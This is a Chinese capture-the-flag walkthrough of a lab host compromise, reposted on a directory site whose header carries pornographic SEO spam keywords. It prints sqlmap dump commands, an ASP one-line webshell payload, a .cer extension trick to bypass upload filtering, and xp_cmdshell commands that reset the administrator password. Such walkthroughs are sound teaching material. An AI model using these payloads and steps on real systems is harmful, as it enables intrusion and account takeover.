日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

0x00 介紹

接著上一篇《CTF之主機滲透系列二》,咱們繼續(xù)。還是那句話,任何工具使用均來自互聯(lián)網(wǎng),涉及到的技術(shù)僅用于教學(xué),不得用于非法用途,請遵守國家安全法律法規(guī),做一個正能量的安全人員。

試題如下:

CTF之主機滲透系列三

 

第一步:我們訪問鏈接:http://202.0.0.23/

CTF之主機滲透系列三

 

進入網(wǎng)頁首頁,通過瀏覽觀察,找到http://202.0.0.23/NewsList.asp?SortID=17 新聞資訊頁面,通過get方法提交的參數(shù)名為SortID,值為1,我們嘗試一下是否存在sql注入,通過sqlmap去跑一下

CTF之主機滲透系列三

 


CTF之主機滲透系列三

 

發(fā)現(xiàn)存在sql注入漏洞sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 –dbs

CTF之主機滲透系列三

 

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS –tables

CTF之主機滲透系列三

 

sqlmap.py -u http://202.0.0.23/Notice.asp?ItemID=17 -D Test_EIMS -T eims_flag –dump

CTF之主機滲透系列三

 

查看賬號密碼的數(shù)據(jù)庫表

CTF之主機滲透系列三

 

對b2076528346216b3進行md5解密,解密得密碼為admin1234賬號為root

第二步:接下來使用御劍后臺掃描,找到后臺登錄頁面

CTF之主機滲透系列三

 


CTF之主機滲透系列三

 

右鍵此頁面查看源碼,找到一個flag:<!--flag2{890b0c4958ef57e9264a9d2703ea7e8c}-->

CTF之主機滲透系列三

 

第三步:使用賬戶root密碼admin1234登錄后臺,在后臺系統(tǒng)信息-文件上傳處上傳后綴為.asp的asp一句話木馬,一句話木馬內(nèi)容:<%eval request("caidao")%> (按照asp一句話木馬格式)

CTF之主機滲透系列三

 

結(jié)果提示上傳文件格式不對,想下繞過辦法

CTF之主機滲透系列三

 

這里我們將一句話木馬文件改一個可執(zhí)行的后綴.cer

CTF之主機滲透系列三

 

則上傳成功第四步:下面我們直接上菜刀工具了

CTF之主機滲透系列三

 

在網(wǎng)站根目錄發(fā)現(xiàn)flag文件flag3{23c5b149510105853f5e7ef9a6f06627}

CTF之主機滲透系列三

 

在數(shù)據(jù)庫配置文件中找到數(shù)據(jù)庫的賬號密碼

CTF之主機滲透系列三

 

使用一句話木馬連接mssql數(shù)據(jù)庫

CTF之主機滲透系列三

 

利用mssql數(shù)據(jù)庫的xpcmdshell組件執(zhí)行系統(tǒng)命令 EXEC master..xp_cmdshell 'whoami'

CTF之主機滲透系列三

 

當前cmdshell的權(quán)限是system權(quán)限,所以直接修改administrator的密碼為hacker:EXEC master..xp_cmdshell 'net user administrator 123456'

CTF之主機滲透系列三

 

第五步:直接遠程桌面連接服務(wù)器administrator/123456,在桌面發(fā)現(xiàn)flag文件,flag5{47baf6d9d60f40c8b1dafa56c62fcd06}

CTF之主機滲透系列三

 


CTF之主機滲透系列三

 

在c盤發(fā)現(xiàn)另外一個flag文件 flag4{e35a01e91e1833d266f95881ae83b4ca}

CTF之主機滲透系列三

 

至此,5個flag就找出來了,未完待續(xù)!!!

更多信安干貨文章,請持續(xù)關(guān)注專欄

知了堂禁衛(wèi)實驗室?zhuanlan.zhihu.com

分享到:
標簽:滲透 主機
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運動步數(shù)有氧達人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定